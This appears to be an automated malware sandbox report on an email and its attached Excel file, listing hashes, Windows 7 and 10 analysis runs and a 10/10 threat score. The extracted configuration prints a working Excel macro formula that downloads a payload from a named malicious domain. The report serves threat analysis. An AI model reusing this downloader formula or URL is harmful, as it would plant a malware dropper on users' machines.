General
-
Target
message__B1F416F39D94659FBC75B63C8DBB85084453114A_unknown_.eml
-
Size
19KB
-
Sample
210305-8gpx9ymckj
-
MD5
542b0d9ad4364dbfba25e1231f713b00
-
SHA1
c4872e70d14d270a62abdc03f32759c73f4ff107
-
SHA256
5a567d8a0d5aac4ed14b29827109754543d099a2d95b97e2173ceccf87d5f6b7
-
SHA512
53a59387173ad6a8dc36d7b6ad7f5c4aebf5c37d0b4af3a17f9e0d19254959f77d59fa50e0a49c4c7f363e1ba67ae235aa6ed2efd1a22b92607559929b50e459
Behavioral task
behavioral1
Sample
document-386407988.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-386407988.xls
Resource
win10v20201028
Malware Config
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
Targets
-
-
Target
document-386407988.xls
-
Size
39KB
-
MD5
1fa4dc11ca13bb6b0007697ea948d103
-
SHA1
34490a498d48b0aa3a8714811f72359f1e68b633
-
SHA256
d90f43e55fea4004620ef90b8a8440493e23e4035b208afaaff7262453217903
-
SHA512
0852782c9db46fff15a6a5c82f29f79d49593ae0109109aa3d0e186ab1a3c7ab0e440a4803b847bd36c75132a71fe0ceb9332aac0d8ba2e6c1bd2b65356bdf87
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-